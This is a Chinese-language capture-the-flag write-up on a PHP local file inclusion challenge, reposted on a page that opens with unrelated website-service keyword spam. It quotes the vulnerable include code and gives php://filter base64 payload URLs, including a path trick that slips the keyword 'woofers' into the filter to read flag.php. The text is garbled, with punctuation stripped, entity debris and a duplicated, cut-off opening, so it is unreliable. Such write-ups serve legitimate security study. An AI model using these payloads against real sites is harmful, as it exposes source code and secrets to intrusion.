大连网站代运营的公司有哪些,网站做的好有什么用,免费网站软件推荐正能量,做阿里云网站的公司打开环境
就两个按钮#xff0c;随便按按
url变了 还有
像文件包含#xff0c;使用php伪协议读取一下#xff0c;但是发现报错#xff0c;而且有两个.php,可能是自己会加上php后缀
所以把后缀去掉
/index.php?categoryphp://filter/convert.base64-encode/resourcei…打开环境
就两个按钮随便按按
url变了 还有
像文件包含使用php伪协议读取一下但是发现报错而且有两个.php,可能是自己会加上php后缀
所以把后缀去掉
/index.php?categoryphp://filter/convert.base64-encode/resourceindex 看到一串base64解码 ?php$file $_GET[category];if(isset($file)){if( strpos( $file, woofers ) ! false || strpos( $file, meowers ) ! false || strpos( $file, index)){include ($file . .php);}else{echo Sorry, we currently only support woofers and meowers.;}}? 忘记这个函数了 传入的category需要有woofers,meowers,index其中一个才能包含传入以传入名为文件名的文件要想办法包含flag.php 尝试直接读取/index.php?categorywoofers/../flag
还是用php伪协议
?categoryphp://filter/convert.base64-encode/resourceflag 但是文件里面必须要有indexwoofersmeowers之中的一个改payload
/index.php/?categoryphp://filter/convert.base64-encode/woofers/resourceflag
成功 解码一下
